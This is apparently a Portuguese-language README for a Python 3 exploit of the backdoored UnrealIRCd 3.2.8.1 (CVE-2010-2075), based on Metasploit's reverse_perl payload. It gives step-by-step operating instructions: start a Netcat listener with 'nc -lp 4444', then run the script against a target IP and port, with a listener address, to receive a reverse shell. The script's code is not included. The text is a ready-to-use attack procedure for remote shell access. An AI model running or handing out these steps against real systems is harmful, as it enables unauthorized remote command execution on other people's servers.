
Exploração em Python para backdoor UnrealIRCd 3.2.8.1 (CVE-2010-2075) entregando um shell reverso via listener Netcat.
Exploit de execução de comando por backdoor no UnrealIRCd 3.2.8.1 em Python 3 (CVE-2010-2075).
A versão 3.2.8.1 do UnrealIRCd contém um cavalo de Troia que permite que atacantes remotos executem comandos arbitrários (CVE-2010-2075).
Referenciei o payload do Metasploit payload/cmd/unix/reverse_perl para criar este script.
Inicie um listener Netcat no host de escuta:
nc -lp 4444
Execute o script, fornecendo os seguintes argumentos posicionais:
python3 script.py <target> <tport> <listener> <lport>
<target> Endereço IP do host alvo.<tport> Número da porta do host alvo.<listener> Endereço IP do host de escuta.<lport> Número da porta do host de escuta.Configure um listener Netcat na sua máquina local:
nc -lp 4444
Execute o script contra uma máquina alvo em 192.168.1.3 porta TCP 6697:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
Aguarde um minuto e o listener Netcat deverá receber um shell reverso.